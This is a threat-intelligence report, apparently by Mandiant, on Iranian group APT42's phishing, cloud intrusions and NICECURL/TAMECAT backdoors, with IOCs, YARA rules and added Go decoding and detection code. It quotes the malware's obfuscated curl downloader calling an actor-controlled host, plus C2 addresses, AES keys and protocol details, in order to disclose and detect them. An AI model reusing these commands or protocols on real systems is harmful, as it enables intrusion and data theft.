Uncharmed: Untangling Iran’s APT42 Operations

Written by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery


APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).

APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection.

In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware.

APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest.

APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), Charming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow Garuda (PwC), and ITG18 (IBM X-Force).

Mandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in the policy and government sectors, media organizations and journalists, and NGOs and activists. The three clusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing emails), but use slightly varied domains, masquerading patterns, decoys, and themes.

A full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.

Cluster A: Posing as News Outlets and NGOs

  • Active: 2021 – today
  • Suspected Targeting: credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran.
  • Masquerading as: The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of typosquatted domains like washinqtonpost[.]press.
    Mandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.
  • Attack vector: Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.

Cluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs

  • Active: 2022 – today
  • Targeting: individuals and entities affiliated with various defense, foreign affairs, and academic issues in the U.S. and Israel.
    • Specifically, in November 2023, Mandiant observed this cluster targeting a nuclear physics professor in a major Israeli university, by using the following phishing URL likely masquerading as a legitimate Microsoft 365 login:

hxxps://email-daemon[.]online/<university_acronym>365[.]onmicrosofl[.]com/accountID=<target_handle>

  • Masquerading as: NGOs, “Mailer Daemon,” and Bitly URL shortening service.
  • Attack vector: legitimate links likely sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.

In these cases, Mandiant observed APT42 encode targets or lures using “1337” (leet) writing. For example, the name of Tamir Pardo (the former head of the Israeli Mossad) was represented in the URL hxxps://bitly[.]org[.]il/t4m1rpa by replacing “a” with 4 and “i” with 1.

  • APT42 likely attempted to use lures related to the International Counter-Intelligence summit (“ICT-2023”) conducted in Israel, by deploying the following URLs:
    • hxxps://bitly[.]org[.]il/J03p4y3r
    • hxxps://youtransfer[.]live/ICT-2023/J03py3r
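As an added example (not part of the Mandiant post), the following Go program shows how a defender could hunt for this leet encoding in proxy logs: it undoes the digit-for-letter substitutions in each URL path segment and compares the result against a watchlist of names. The log lines, the .test hostnames and the watchlist entry "janedoe" are constructed; the substitution table extends the two swaps the post documents (4 for a, 1 for i) with other common ones, which is an assumption about the actor's habits rather than something the post states.

```go
package main

import (
	"fmt"
	"strings"
)

// Hit records a proxy log line whose URL path, once leet substitutions are
// undone, contains a watchlist name or is a truncated form of one.
type Hit struct {
	Line string
	Name string
}

// leetReplacer undoes the substitutions the post shows (4 for a, 1 for i)
// together with other common digit-for-letter swaps; extending beyond the
// two documented swaps is an assumption.
var leetReplacer = strings.NewReplacer(
	"4", "a", "1", "i", "3", "e", "0", "o", "7", "t", "5", "s",
)

// Watchlist is constructed: names stored lower-case without spaces.
// "tamirpardo" is the example from the post; "janedoe" is invented.
var Watchlist = []string{"tamirpardo", "janedoe"}

// NormalizeLeet lower-cases a slug and undoes leet substitutions.
func NormalizeLeet(s string) string {
	return leetReplacer.Replace(strings.ToLower(s))
}

// pathOf returns the path portion of a URL. It avoids net/url so that
// defanged hosts such as bitly[.]org[.]il do not cause a parse failure.
func pathOf(raw string) string {
	if i := strings.Index(raw, "://"); i >= 0 {
		raw = raw[i+3:]
	}
	if j := strings.Index(raw, "/"); j >= 0 {
		return raw[j:]
	}
	return ""
}

// MatchLureURL normalizes every path segment and returns the first watchlist
// name it contains. Segments shorter than minSlug are skipped to limit noise,
// and a segment that is a prefix of a name still matches, so a truncated slug
// like t4m1rpa is caught.
func MatchLureURL(rawURL string) (string, bool) {
	const minSlug = 6
	for _, seg := range strings.Split(pathOf(rawURL), "/") {
		n := NormalizeLeet(seg)
		if len(n) < minSlug {
			continue
		}
		for _, name := range Watchlist {
			if strings.Contains(n, name) || strings.HasPrefix(name, n) {
				return name, true
			}
		}
	}
	return "", false
}

// ScanProxyLog applies MatchLureURL to lines of the form
// "<timestamp> <client> <url>" and returns the hits in order.
func ScanProxyLog(lines []string) []Hit {
	var hits []Hit
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 3 {
			continue
		}
		if name, ok := MatchLureURL(fields[2]); ok {
			hits = append(hits, Hit{Line: line, Name: name})
		}
	}
	return hits
}

// SampleProxyLog is constructed test data; the hosts are reserved .test names.
var SampleProxyLog = []string{
	"2024-03-01T09:12:44Z 10.0.0.7 https://example-shortener.test/t4m1rpa",
	"2024-03-01T09:13:02Z 10.0.0.9 https://docs.example.test/ICT-2023/agenda.pdf",
	"2024-03-01T09:15:10Z 10.0.0.7 https://example-transfer.test/invite/j4n3d03",
}

func main() {
	for _, h := range ScanProxyLog(SampleProxyLog) {
		fmt.Printf("watchlist name %q encoded in: %s\n", h.Name, h.Line)
	}
}
```

The minimum slug length and the prefix rule are the two knobs that trade recall against noise; short path segments such as "invite" or "agenda.pdf" never reach the watchlist comparison, while the seven-character slug from the post still matches the full name it abbreviates.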

Head(er) In The Cloud: Targeting Microsoft 365 Environments

As an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed APT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud infrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. However, since the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is possible the victimology is much wider.

These operations began with enhanced social engineering schemes to gain initial access to victim networks, often involving ongoing trust-building correspondence with the victim. Only then were the desired credentials acquired and multi-factor authentication (MFA) bypassed: first by serving a cloned website to capture the MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded).

These techniques have allowed APT42 to covertly access and compromise the victim’s Microsoft 365 environment, relying on built-in features and open-source tools to decrease their chances of being detected.

APT42 deployed multiple defense evasion techniques to minimize their intrusion footprint:

  • Relying on built-in features of the Microsoft 365 environment and publicly available tools. This serves two purposes: it hampers attribution based on tooling and lets the actor blend into the environment; it also shows increased adaptability.
  • Clearing Google Chrome browser history after reviewing documents of interest.
  • Attempting (and possibly succeeding) to exfiltrate files to a OneDrive account masquerading as the victim’s organization, using the fake email address <victim_org_name>@outlook[.]com. APT42 also browsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. 
  • Using anonymized infrastructure to interact with the victim’s environment, including ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers. 

Despite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to APT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very specific Iran-related nature of intelligence collected by the actor. 

APT42 Malware-Based Operations

Mandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42 deploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy content (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors provide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to manually execute commands on the device.

Mandiant estimates APT42 used these backdoors to target NGOs, government, or intergovernmental organizations around the world that handle issues related to Iran and the Middle East, consistent with APT42's targeting profile.

Malware Family | Description
NICECURL       | A backdoor written in VBScript that can download additional modules to be executed, including data mining and arbitrary command execution
TAMECAT        | A PowerShell toehold that can execute arbitrary PowerShell or C# content

Table 1: APT42 Malware Families

NICECURL

NICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a datamining module, and it provides an arbitrary command execution interface. The backdoor’s accepted commands include “kill” to remove artifacts and end execution, “SetNewConfig” to set a new sleep value, and “Module” to download and execute additional files, potentially extending NICECURL’s functionality. NICECURL communicates over HTTPS.

In January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that masqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The decoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy researcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no indication these entities were targeted or compromised, but merely spoofed by APT42 decoys.

In February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5: 347b273df245f5e1fcbef32f5b836f1d), which connects to worried-eastern-salto[.]glitch[.]me and downloads a decoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace from an American think tank specializing in U.S. foreign policy and international relations (Figure 20).

According to the contents of the decoy file, the attack possibly happened in January or the beginning of February 2024 and targeted a victim located in Australia.

Mandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace Gender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7). This RAR file shares the same name with the decoy PDF and likely targeted the same victim. 

This infection chain was previously documented by Volexity.

TAMECAT 

In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary PowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.

TAMECAT Execution

Execution begins with a small VBScript downloader that uses Windows Management Instrumentation (WMI) to query the anti-virus products running on the victim's system. Depending on whether the script determines that Windows Defender is running, different download commands and URLs are used.

If Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses Wget to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.

For all other cases, the script uses Cmd.exe to execute a Curl command that is similar to Curl commands used in the NICECURL execution chain previously described:

cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d ""i1=aaaa&EF1=2m.txt&WF1=test.pdf"" -X PO9ST hxxp://tnt200[.]mywire[.]org/Do1 -o %temp%2m.v9bs & call %c:9=% & set b=sta9rt """" ""%temp%2m.v9bs"" & call %b:9=%
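The "set c=... & call %c:9=%" construction hides the real command behind filler digits that cmd.exe only strips when "call" re-expands the variable. The Go program below is an added example, not Mandiant's tooling, that resolves that substitution statically so an analyst can read such a one-liner from a log or a sample without executing it. The one-liner it processes is constructed from harmless commands; references it cannot resolve, such as %temp%, are left as they are.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// cmdPrefixRe strips a leading "cmd.exe /c " so the first segment is parsed
// like the others.
var cmdPrefixRe = regexp.MustCompile(`(?i)^\s*cmd(?:\.exe)?\s+/c\s+`)

// setRe matches a "set NAME=VALUE" segment; cmd keeps everything after "=".
var setRe = regexp.MustCompile(`(?i)^set\s+([A-Za-z_][A-Za-z0-9_]*)=(.*)$`)

// subRe matches a %NAME:OLD=NEW% reference. NEW may be empty, which is what
// "%c:9=%" relies on to delete the filler digits.
var subRe = regexp.MustCompile(`%([A-Za-z_][A-Za-z0-9_]*):([^=%]+)=([^%]*)%`)

// splitSegments splits on "&" but ignores "&" inside double quotes, as
// cmd.exe does (the -d payload in the sample above contains "&").
func splitSegments(line string) []string {
	var segs []string
	var cur strings.Builder
	inQuote := false
	for _, r := range line {
		switch {
		case r == '"':
			inQuote = !inQuote
			cur.WriteRune(r)
		case r == '&' && !inQuote:
			segs = append(segs, cur.String())
			cur.Reset()
		default:
			cur.WriteRune(r)
		}
	}
	return append(segs, cur.String())
}

// DeobfuscateCmd records "set" assignments and expands %VAR:old=new%
// references the way the delayed "call" does, returning the commands that
// would actually run, in order. References to variables it has not seen
// (for example %temp%, which has no ":old=new" part anyway) are left as-is.
func DeobfuscateCmd(line string) []string {
	if m := cmdPrefixRe.FindStringIndex(line); m != nil {
		line = line[m[1]:]
	}
	vars := map[string]string{}
	var out []string
	for _, seg := range splitSegments(line) {
		seg = strings.TrimSpace(seg)
		if seg == "" {
			continue
		}
		if m := setRe.FindStringSubmatch(seg); m != nil {
			vars[strings.ToLower(m[1])] = m[2]
			continue
		}
		expanded := subRe.ReplaceAllStringFunc(seg, func(ref string) string {
			m := subRe.FindStringSubmatch(ref)
			val, ok := vars[strings.ToLower(m[1])]
			if !ok {
				return ref
			}
			return strings.ReplaceAll(val, m[2], m[3])
		})
		if strings.HasPrefix(strings.ToLower(expanded), "call ") {
			expanded = strings.TrimSpace(expanded[5:])
		}
		out = append(out, expanded)
	}
	return out
}

// SampleCmdLine is a constructed one-liner that uses the same
// "set ... & call %var:9=%" trick around harmless commands.
const SampleCmdLine = `cmd.exe /c set c=ec9ho "Hel9lo & goodbye" & call %c:9=% & set b=wh9oami /u9ser & call %b:9=%`

func main() {
	for i, cmd := range DeobfuscateCmd(SampleCmdLine) {
		fmt.Printf("%d: %s\n", i+1, cmd)
	}
}
```

Because the resolver never executes anything, it is safe to run over command lines harvested from process-creation telemetry; the resolved strings are what a detection rule should be written against, since the obfuscated form varies with the filler character the actor picks.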

The downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that contains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional PowerShell script that is used to AES decrypt the embedded TAMECAT backdoor.

When downloading the AES decryption script, the following hard-coded User-Agent string is used:

  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

It is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a previously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513), further indicating the two samples belong to the same malware family. However, the unique value is not used in the script.

The script stores the URL for the AES decryption script as a Base64 string where the first three characters are truncated and the remaining string is Base64 decoded: 

  • pepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0
    • Decodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt
  • The script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)

The response content is Base64 decoded and also further decoded using a routine that does the following:

  • Inverts the bits of each byte within an array named $bytesOfRes
  • Extracts the least significant byte (8 bits) from the inverted representation
  • Converts the extracted byte back into a numerical byte value
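The two decoding steps just described (drop three filler characters and Base64 decode the URL; Base64 decode the response and invert each byte) are short enough to re-implement for triage. The Go program below is an added example, not code from the post or from the malware, and uses the Base64 string quoted above together with a constructed stand-in for the second-stage content; the function name inside that stand-in is invented.

```go
package main

import (
	"encoding/base64"
	"fmt"
)

// DecodePrefixedURL drops the three filler characters the loader puts in
// front of the Base64 URL and decodes the remainder.
func DecodePrefixedURL(s string) (string, error) {
	if len(s) < 3 {
		return "", fmt.Errorf("value too short to carry a prefix: %q", s)
	}
	b, err := base64.StdEncoding.DecodeString(s[3:])
	if err != nil {
		return "", fmt.Errorf("base64: %w", err)
	}
	return string(b), nil
}

// DecodeInvertedPayload undoes the second stage: Base64 decode, then replace
// each byte with the low 8 bits of its bitwise inversion. In Go, ^b on a
// byte already yields exactly those 8 bits, which is what the script's
// "invert, keep the least significant byte" steps amount to.
func DecodeInvertedPayload(s string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(s)
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	out := make([]byte, len(raw))
	for i, b := range raw {
		out[i] = ^b
	}
	return out, nil
}

// EncodeInvertedPayload is the forward transform, present only so a
// constructed sample can be produced offline. Bit inversion is its own
// inverse, so it is the same byte step followed by Base64 encoding.
func EncodeInvertedPayload(plain []byte) string {
	inv := make([]byte, len(plain))
	for i, b := range plain {
		inv[i] = ^b
	}
	return base64.StdEncoding.EncodeToString(inv)
}

// PrefixedURLFromReport is the value quoted in the post.
const PrefixedURLFromReport = "pepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0"

// SampleStage is a constructed stand-in for the content served at that URL,
// encoded the way the loader expects; the function name is invented.
var SampleStage = EncodeInvertedPayload([]byte("function Decrypt-Data { param($Value) }"))

func main() {
	u, err := DecodePrefixedURL(PrefixedURLFromReport)
	if err != nil {
		panic(err)
	}
	fmt.Println("stage URL:", u)
	body, err := DecodeInvertedPayload(SampleStage)
	if err != nil {
		panic(err)
	}
	fmt.Printf("decoded stage: %s\n", body)
}
```

A useful property for hunting: because the inversion flips every bit, the Base64 alphabet of the encoded stage is ordinary but the decoded bytes are all high-ASCII before the final step, so a sandbox that only Base64-decodes the HTTP body will see binary noise rather than the PowerShell text.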

Once decoded, the resulting PowerShell function resembles the following:

The decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it defines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted and executed.

The following AES key and IV are used to decrypt content:

  • AES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B
  • AES IV: 0T9r1y1M2e0N0o1w

The parent script uses the AES decrypt function to Base64 decode and then AES decrypt the following string, which is contained in the parent script:

v+UDXK47mBGgYqTbOXjXVD6MzhZenTfVf6CKxQFp2+AiPHMvmA2a4IiBz4rOi8ffxWdXFtrPk6UABw1b6oBPsW1VV/HNU0mf8jH7xsoBAHY5Sp6vdYc7WGZ6SYO72KIH/hOyBlS5wc7Y86wJR9naW+0nINCYZV6RyD5t/fDpqEoRYW6dHwoebLECkEck/N5C1jhlFHaoS51QKSfgraHI5iRiT6pfpqUNeJHbYz3VYuo/j2FZ6f5BCJgXoHKPmf4pUSwSZH0qQSa98blmdAH+tG7jc3AUE76IHx4xkzxAldO/4b97duoI6rm+Ucy3rRHHrVnPQ0TvvTvudD/LDBwn3DkNcKSTDvEQDwIgni/MU7BOwklcE1+qQjabXTGr+CrL0c53dNA4OGNYkBAnLokjcoNxKmxbCSK3oSdFEz2+htgPMOjq14IGoPSOWcPX2CVK

The TAMECAT backdoor initially writes a likely victim identifier to the following location: %LOCALAPPDATA%config.txt.

The TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. 

The initial POST request contains information like the following, which are AES encrypted and Base64 encoded:

{
    "rwsdjfxsdf": [
        {
            "num": "1"
        },
        {
            "OS": "<os_caption>"
        },
        {
            "ComputerName": "<computer_name>"
        },
        {
            "Token": "<value_from_configtxt>"
        }
    ]
}

The TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B and a randomly generated 16-character IV, generated from the string ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to the POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the same AES key is used for multiple victims. 

If the response is successful, it is also expected to contain a header named Content-DPR, which is expected to house an IV used with the aforementioned AES key to decrypt the response data.

The decrypted response data is split by the paragraph symbol (¶) into four values:

  • Language
  • Command
  • ThreadName
  • StartStop
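To decrypt captured TAMECAT traffic offline, an analyst needs the shared key, the IV from the Content-DPR header and the split on ¶. The Go program below is an added example rather than code from the post; it assumes AES in CBC mode with PKCS#7 padding (the .NET defaults behind CreateDecryptor, which the post does not state), and it builds a constructed sample message with the forward transform so the decoder can be exercised without a capture.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// TamecatKey is the 32-byte key the post documents for this sample (AES-256).
// Because it is shared across victims, captured traffic can be decrypted offline.
const TamecatKey = "kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B"

// ivAlphabet is the character set the post says the 16-byte IV is drawn from.
const ivAlphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

// Tasking holds the four fields of a decrypted C2 response.
type Tasking struct {
	Language, Command, ThreadName, StartStop string
}

// DecryptC2 reverses the transport for one captured message: Base64 decode
// the body, then AES-CBC decrypt with the shared key and the IV from the
// Content-DPR header. CBC and PKCS#7 padding are assumptions (the .NET
// defaults behind CreateDecryptor); the post does not state them.
func DecryptC2(bodyB64, contentDPR string) ([]byte, error) {
	if len(contentDPR) != aes.BlockSize {
		return nil, fmt.Errorf("Content-DPR must be %d bytes, got %d", aes.BlockSize, len(contentDPR))
	}
	ct, err := base64.StdEncoding.DecodeString(bodyB64)
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher([]byte(TamecatKey))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(contentDPR)).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// pkcs7Unpad validates and strips PKCS#7 padding; a wrong key usually shows up here.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	for _, p := range b[len(b)-n:] {
		if int(p) != n {
			return nil, errors.New("bad PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

// ParseTasking splits a decrypted response on the paragraph symbol into the
// four fields listed above.
func ParseTasking(pt []byte) (Tasking, error) {
	parts := strings.Split(string(pt), "¶")
	if len(parts) != 4 {
		return Tasking{}, fmt.Errorf("expected 4 fields, got %d", len(parts))
	}
	return Tasking{parts[0], parts[1], parts[2], parts[3]}, nil
}

// EncryptC2 is the forward transform, used here only to build a constructed
// sample message so the decoder can be exercised. It returns the Base64 body
// and the IV that would travel in Content-DPR.
func EncryptC2(pt []byte) (string, string, error) {
	rnd := make([]byte, aes.BlockSize)
	if _, err := rand.Read(rnd); err != nil {
		return "", "", err
	}
	iv := make([]byte, aes.BlockSize)
	for i := range iv {
		iv[i] = ivAlphabet[int(rnd[i])%len(ivAlphabet)]
	}
	block, err := aes.NewCipher([]byte(TamecatKey))
	if err != nil {
		return "", "", err
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(ct), string(iv), nil
}

// SampleResponse is a constructed tasking string in the documented layout.
const SampleResponse = "powershell¶Get-Date¶t1¶start"

func main() {
	body, iv, err := EncryptC2([]byte(SampleResponse))
	if err != nil {
		panic(err)
	}
	pt, err := DecryptC2(body, iv)
	if err != nil {
		panic(err)
	}
	task, err := ParseTasking(pt)
	if err != nil {
		panic(err)
	}
	fmt.Printf("Content-DPR: %s\nbody: %s\n%+v\n", iv, body, task)
}
```

For a real capture, feed the HTTP body and the Content-DPR header value into DecryptC2; the IV being plain letters in a header is itself a detection opportunity, since a 16-character alphabetic Content-DPR value is not something a browser ever sends.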

The available commands appear mostly the same as in previously identified TAMECAT samples:

Variable   | Value                          | Description
$language  | powershell or csharp           | Interpret the command value as PowerShell or C# code
$StartStop | downloadutils or start or stop | Download additional content, start the command with parameters, or stop the command

Table 2: Available commands

Outlook and Implications

APT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the Israel-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. 

In addition to deploying custom implants on compromised devices, APT42 was also observed conducting extensive cloud operations. In cloud environments not vulnerable to implants, APT42 relies on social engineering to harvest credentials and collect intelligence of strategic interest to Iran. Credential abuse was also emphasized as a common initial access vector to cloud environments in the latest Google Cloud Threat Horizons report.

The methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their activities more challenging for network defenders. The TTPs, IOCs, and provided rules included in this blog post may support detection and mitigation efforts.

For Google Chronicle Enterprise+ customers, Chronicle rules have been released to your Emerging Threats rule pack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence. In addition, the IOCs listed in this blog post are blocked in Safe Browsing, protecting Google Chrome users, as well as other browsers.

NICECURL: YARA Rules

rule M_APT_Backdoor_NICECURL_1 {
	meta:
		author = "Mandiant"
		md5 = "c23663ebdfbc340457201dbec7469386"
		date_created = "2024-01-18"
		date_modified = "2024-01-18"
		rev = "1"
	strings:
		$ = "a = \"llehS.tpircsW\"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)"
		$ = "WHFilePath = Temp & \"/\" & ProgName" ascii wide
		$ = "Do While not FileExists(WHFilePath)" ascii wide
		$ = "cmd /C start /MIN curl --ssl-no-revoke -s -d \"\"\"" ascii wide
		$ = "nicecmdPath = Temp & \"/\" & ProgName" ascii wide
		$ = "Function RunCom(Com, Url, nicecmdPath)" ascii wide
		$ = "ComDecode = Base64Decode(Com)" ascii wide
		$ = "InStr(ComDecode, \"kill\")" ascii wide
		$ = "InStr(ComDecode, \"SetNewConfig\")" ascii wide
		$ = "InStr(ComDecode, \"Module\")" ascii wide
		$ = "Sub DeleteFile(filespec)" ascii wide
		$ = "Sub CopyFile(Src, Dst)" ascii wide
		$ = "Function SendData(sUrl, sRequest, nicecmdPath)" ascii wide
		$ = "Function WriteToFile(FilePath, data)" ascii wide
		$ = "Function GetSystemCaption()" ascii wide
		$ = "Function GetPlainSess()" ascii wide
	condition:
		4 of them
}

rule M_APT_Backdoor_NICECURL_datamine_module_1 {
	meta:
		author = "Mandiant"
		md5 = "853687659483d215309941dae391a68f"
		date_created = "2024-01-18"
		date_modified = "2024-01-18"
		rev = "1"
	strings:
		$ = "a = \"llehS.tpircsW\"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)" ascii wide
		$ = "ModuleName & \" module started successfully.\"" ascii wide
		$ = "SendLog(MAC, Logs, ModuleName, \"Success\")" ascii wide
		$ = "& vbNewLine  & \"*** Ant:\"" ascii wide
		$ = "For Each antivirus in installedAntiviruses" ascii wide
		$ = "list=list & VBNewLine & antivirus.displayName" ascii wide
		$ = "checking the state of the 12th bit of productState property of the antivirus" ascii wide
		$ = "For Each item In query_result" ascii wide
		$ = "Set query_result = objWMI.ExecQuery(\"" ascii wide
		$ = "Function SendFile(FilePath, ModuleName)" ascii wide
		$ = "Function SendData(Base64Data, FolderName, FileName, Format)" ascii wide
		$ = "call HTTPPost(Url, sRequest)" ascii wide
		$ = "ChunckData = Mid(Base64Data, 1, lengthdata)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)" ascii wide
		$ = "Function SendLog(MAC, Logs, ModuleName, Status)" ascii wide
	condition:
		4 of them
}

rule M_APT_Backdoor_TAMECAT_2 {
	meta:
		author = "Mandiant"
		md5 = "9c5337e0b1aef2657948fd5e82bdb4c3"
		date_created = "2024-03-05"
		date_modified = "2024-03-05"
		rev = "1"
	strings:
		$ = "$a.CreateDecryptor($a.Key,$a.iv)"
		$ = "$CommandParts = \""
		$ = "$macP = $env:APPDATA+\""
		$ = "$macP = \"$env:LOCALAPPDATA"
		$ = "$mac += Get-Content -Path $macP"
		$ = "$CommandParts =$SessionResponse.Split(\""
		$ = "[string]$CommandPart = \"\";"
		$ = "Foreach ($CommandPart in $CommandParts)"
		$ = "$CommandPart.Split(\"~\");"
		$ = "elseif($StartStop -eq \"stop\")"
		$ = "if($StartStop -eq \"start\")"
		$ = "&(gcm *ke-e*) $Command;"
	condition:
		3 of them and filesize<2MB
}

Source: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations